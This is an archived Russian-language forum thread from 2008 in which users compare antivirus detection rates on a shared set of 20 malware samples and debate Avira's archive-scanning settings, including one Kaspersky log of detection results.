Да то-то и оно, что мне кажется, что это скорее не баг, а достоинство! Если я не боюсь архивов, полагая, что угрозу представляет исполняемый модуль, и при этом меня не беспокоит, что на компьютере хранится заархивированная зараза, я могу спокойно снять птичку и разгрузить ресурсы. На других же антивирусах такой номер не пройдёт - самораспаковывающиеся файлы всё равно будут сканироваться.

Принимая во внимание массу опций по рекурсиям и размерам архивов, могу точно сказать: лучшего подхода к сканированию архивов, чем у Авиры, я не видел!
Автор: HDD
Дата сообщения: 17.07.2008 20:27
Архив из 20 файлов.
Kis 10 оставил(
CureIT 15 оставил.
Автор: aleksdem2
Дата сообщения: 17.07.2008 20:30
gjf

Цитата:
лучшего подхода к сканированию архивов, чем у Авиры, я не видел!

Я не возражаю. Но баг в том, что я, как пользователь, обманут. Ставлю настройку проверять архивы по 100мБт и с глубиной рекусии 20, а он не проверяет элементарные...Снял птицы - проверяет все подряд.... Это не есть хорошо. Я дожен быть уверен в выполнении своих команд.



Добавлено:
HDD

Цитата:
Kis 10 оставил

Так это более-менее. Непонятно, что же это AVZ вообще ничего не видит. Контора теперь то одна отвечает за выпуск продуктов...
Автор: acnevulgaris
Дата сообщения: 17.07.2008 20:43
В 20-ти файлах:
DrWeb -> нашел 8шт
KAV (в составе ZASS) -> нашел 13шт

Добавлено:
А теперь по-хитрому:
В 20-ти файлах
KAV (в составе ZASS) -> нашел 13шт и послал их в карантин.
После KAV`а DrWeb нашел (уже из 7 файлов) ЕЩЕ 3 шт.

Итого - в двадцатке, предположительно, 4 "здоровых" файла:
ESS-NOD32 Fix 2047 Lite 1.5.exe
euro.exe
Локальный диск (С).exe
Пароли от аськи.exe
Автор: sereja8
Дата сообщения: 17.07.2008 21:02

Цитата:
Здесь нет спецов... могу если хотите натравить посещения дятлов от дрвеба, каспера и есет... но учитывая здешний варезник делать этоК тут не стоит...

А чего вы решили что их тут нету

Добавлено:
Как там обстоят дела с Нодом? Сколько он выловил и чем?
Автор: HDD
Дата сообщения: 17.07.2008 21:20

Цитата:
KAV (в составе ZASS)

Там 6-я версия?
Автор: acnevulgaris
Дата сообщения: 17.07.2008 21:25
HDD
Не владею достоверной информацией, но когда-то смотрел dll`ки - они встречались самых разный версий: и 5.xx, и 6.xx, и 7.xx.
Но базы актуальные, это точно.
Автор: HDD
Дата сообщения: 17.07.2008 22:00

Цитата:
Но базы актуальные, это точно.

Просто странно, что у меня Kis нашёл 10, а у тебя 13.
Автор: dgsjsj
Дата сообщения: 17.07.2008 22:14
aleksdem2

Цитата:
Ставлю настройку проверять архивы по 100мБт
Ты не перепутал?

Цитата:
Допустимые значения - между 1 и 9999 KB. Значение по умолчанию - 1000 KB. Оно является рекомендуемым.
Справка Avira AntiVir .
Автор: acnevulgaris
Дата сообщения: 17.07.2008 22:20
HDD

[more]
AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Trojan.VBS.Small.at,G:\TMP\Virus\ad-award.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Backdoor.Win32.Grobodor.e,G:\TMP\Virus\cloc.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Trojan.Win32.VB.crx,G:\TMP\Virus\cs.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Trojan.VBS.Small.as,G:\TMP\Virus\Firefox.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Packed.Win32.Klone.av,G:\TMP\Virus\ICQ_patch.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Trojan-PSW.Win32.LdPinch.gkp,G:\TMP\Virus\kuku.exe,File Repair Failed,Manual
,2008/07/17,22:13:26 +3:00 GMT,

AV/treatment,2008/07/17,22:13:26 +3:00 GMT,Trojan-Downloader.Win32.Agent.nvn,G:\TMP\Virus\Lol.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00 GMT,Type_Script,G:\TMP\Virus\Patch fo Kaspersky 7.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00 GMT,Trojan-PSW.Win32.QQPass.bti,G:\TMP\Virus\pinguin.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00
GMT,Trojan.BAT.Copybat.e,G:\TMP\Virus\Адресса абонентов Кабельного ТВ.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00 GMT,Trojan.Win32.Erase2002.a,G:\TMP\Virus\Декларации по продаже.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00 GMT,Trojan-PSW.Win32.LdPinch.shh,G:\TMP\Virus\Марта.scr,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,

AV/treatment,2008/07/17,22:13:28 +3:00 GMT,Trojan.VBS.Disabler.g,G:\TMP\Virus\Счета оплаты.exe,File Repair Failed,Manual
,2008/07/17,22:13:28 +3:00 GMT,
[/more]
Автор: Viktor_Kisel
Дата сообщения: 18.07.2008 08:12
aleksdem2

Цитата:
Разобрался я с фокусами монитора Avira. В настройках гуарда (монитора) возле опций "проверять архивы" нужно оставить птицу только возле верхней строки - "проверять архивы". Возле всех остальных - снять. (Глубина рекурсии и т.д.).

У меня монитор проверяет архивы, если снять птицу Макс. объем (КВ) - это единственный баг (не проверяет даже архив .zip 35 КБ - содержимое файл 92 КБ). Остальные птицы стоят и архивы нормально проверяются (проверил на Avira Personal и Avira Premium).
Автор: pav
Дата сообщения: 18.07.2008 08:36
sereja8
17:34 17-07-2008
Цитата:
Проверьте если не трудно 20экземпляров

Проверил официальным ESET NOD32 3.0.636 (200807018):
Количество просканированных объектов: 21
Количество заражённых объектов: 1
D:\Temp\Virus\Марта.scr - вероятно модифицированный Win32/PSW.LdPinch троянская программа

DrWeb 4.44 официальный с базами от 2008-07-17 (23:14):
Проверенных объектов: 25
Обнаруженных вирусов: 5
Автор: aleksdem2
Дата сообщения: 18.07.2008 10:27
dgsjsj
Да я просто так написал 100мБт. Имелся ввиду любой размер.

Viktor_Kisel

Цитата:
У меня монитор проверяет архивы, если снять птицу Макс. объем (КВ) - это единственный баг (не проверяет даже архив .zip 35 КБ - содержимое файл 92 КБ)

Так я же именно про это и говорю. В данном конкретном архиве именно этот баг не давал монитору найти ряд зловредов. Что касается глубины рекурсии, так зачем вообще давать это ограничение. Именно зловреды глубоко прячут...
Автор: gjf
Дата сообщения: 18.07.2008 11:04
aleksdem2

Цитата:
Что касается глубины рекурсии, так зачем вообще давать это ограничение


Думаю, что это нужно для оптимальной настройки. Чем больше рекурсии - тем больше ресурсов сожрёт проверка такого архива.
Автор: dgsjsj
Дата сообщения: 18.07.2008 11:05
aleksdem2
Довод принят, согласен. Но в инструкциях есть смысл обращать внимание на мелкий текст и примечания.

Цитата:
Примечание
По умолчанию опция отключена, так как процесс использует слишком много ресурсов. Мы рекомендуем проверять архивы с помощью Проверки.

Становится понятно, что пока это чисто "украшательство", а реально проверяет архивы Scanner.
Автор: Viktor_Kisel
Дата сообщения: 18.07.2008 11:13
dgsjsj

Цитата:
Становится понятно, что пока это чисто "украшательство", а реально проверяет архивы Scanner.

Нет в первую очередь реально архивы проверяет монитор при его включении в настройках. Правда эта проверка замедляет открытие папок содержащих архивы и открытие самих архивов. Так что эта опция уже на любителя.
Автор: aleksdem2
Дата сообщения: 18.07.2008 11:17
dgsjsj
Да дело в том, что инструкция совершенно не является догмой и, тем более, панацеей. Посмотрите, хотя бы, кто её автор в русской версии. И по секрету скажу Вам, что там многое не соответствует действительности. Вот попробуйте настроит монитор по моим рекомендациям, и Вы будете удивлены тем, что потребление ресурсов практически не увеличилось. Зато намного больше доверия монитору, а значит и всему антивирусу. Ну разве так часто Вы используете сканер, чтобы на него полагаться?
Автор: gjf
Дата сообщения: 18.07.2008 11:26
aleksdem2
Вы правы, но всё-таки я считаю, что подобные настройки необходимы на компьютерах чистых пользователей, которые вообще не понимают, что делают, а потому чем больше безопасности - тем лучше. Как я и писал выше, архив с вирусом приносит только тот вред, что занимает место на жёстком диске. Исполнить код монитор всё равно не даст. По аналогии с тем, как время от времени мы выполняем очистку и сжатие данных на диске, можно запускать сканер и удалять такой "мусор". По-моему, всё довольно логично.
Автор: aleksdem2
Дата сообщения: 18.07.2008 11:32
gjf

Цитата:
По-моему, всё довольно логично.

И по моему тоже. Было до вчерашнего архива со зловредными самораспаковывающимися архивами, а посути с exe- файлами. Если зловред "скучает" в RER или любом другом архиве - это одно дело. А вот стоять на старте в exe-шнике, - это несколько другая песня.
Автор: gjf
Дата сообщения: 18.07.2008 11:39
aleksdem2
А толку? Ну запущу я этот файл, код запуститься не сможет - его убьёт монитор до того, как его проинициализирует дроппер! Вчера ради интереса поставил монитор на скан только исполняемых файлов и позапускал все самораспаковщики, внутри которых были детектируемые вирусы. Не пропустился ни один - хоть бат, хоть экзешник, хоть вбс-скрипт. Так что даже в этом ракурсе вред один - место на диске.
Автор: aleksdem2
Дата сообщения: 18.07.2008 12:30
gjf

Цитата:
А толку? Ну запущу я этот файл, код запуститься не сможет - его убьёт монитор до того, как его проинициализирует дроппер!...Не пропустился ни один - хоть бат, хоть экзешник, хоть вбс-скрипт

Это говорит о высоком качестве монитора Avira. В принципе, на это всегда ссылаются и разработчики данного продукта, когда их начинают "доставать" неумением Avira искать зловреды в архивах. Пожалуй, с ними (и с Вами) можно согласиться...
Автор: gjf
Дата сообщения: 18.07.2008 12:37
aleksdem2
А что, мониторы других антивирусов не делают того же? Я действительно не знаю - это вопрос.
Ведь программно это обычный хук на функцию чтения-записи. Если исходно компьютер не заражён и эти функции "чистые" - должно реализоваться...

Добавлено:
А вообще удивляет тотальное молчание обладателей других антивирусов

Страницы: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768

Предыдущая тема: Internet телефония


Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.